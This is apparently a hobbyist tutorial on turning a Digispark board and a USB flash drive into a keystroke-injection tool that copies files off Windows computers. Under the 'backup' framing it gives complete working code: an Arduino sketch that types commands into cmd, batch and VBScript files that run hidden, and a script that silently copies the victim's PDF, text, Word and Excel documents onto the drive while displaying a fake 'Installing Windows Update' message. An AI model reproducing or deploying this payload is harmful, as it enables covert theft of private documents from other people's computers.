Exfiltrating files with Digispark

Introduction

Some time ago I wrote a tutorial titled "1$ USB Rubber Ducky alternative", this is somewhat a continuation of that tutorial.
ITT: I'm going to show you how you can use a Digispark and a regular flashdrive to backup files from computers to a flash drive.
For the purpose of this tutorial I will not go trough setting up the Digispark dev enviroment, for that take a look at 1$ USB Rubber Ducky alternative
Quick demo:

What you'll need

  • Digispark
  • Arduino software
  • USB drive
  • (Optional) USB hub

Setting up the flashdrive

  1. Rename your flashdrive to something unique, I named it PK because it's a shorten version of "pika" (You'll be using the name of the flash as a way to find where you want to put your files)
  2. Create a cuple of files on the flashdrive:
  • d.cmd(Blinks the CAPSLOCK LED when started, executes i.vbs):
@echo off
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
cscript %~d0\i.vbs %~d0\e.cmd
@exit
  • e.cmd (Copies files, blinks the CAPSLOCK LED when done):
@echo off
@echo Installing Windows Update

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM Documents
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.txt %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.doc %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.xls %dst% >>nul
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit
  • i.vbs(Executes e.cmd invisibly):
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Setting up the Digispark

Just flash this code to your Digispark, replace the PK on the 23 line to the name of your flashdrive

#include "DigiKeyboard.h"

void setup() {
// don't need to set anything up to use DigiKeyboard
}

void loop() {
// this is generally not necessary but with some older systems it seems to
// prevent missing the first character after a delay:
DigiKeyboard.sendKeyStroke(0);

// Open cmd
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT);
DigiKeyboard.delay(1000);
DigiKeyboard.print("cmd");
DigiKeyboard.delay(200);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);

// Execute code from the interwebs
DigiKeyboard.print("powershell \".((gwmi win32_volume -f 'label=''PK''').Name+'d.cmd')\"");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
while(true){
  //do nothing
}
}

Final notes

Congratulations you're done!
You could use some cheap usb hub to make it use only one port.
The current payload will only take pdf, txt, doc, xlsx files, but you can modify the e.cmd file to add your own extensions, just keep in mind that the more extensions you add, the more time will be needed for the payload to finish its job.

External links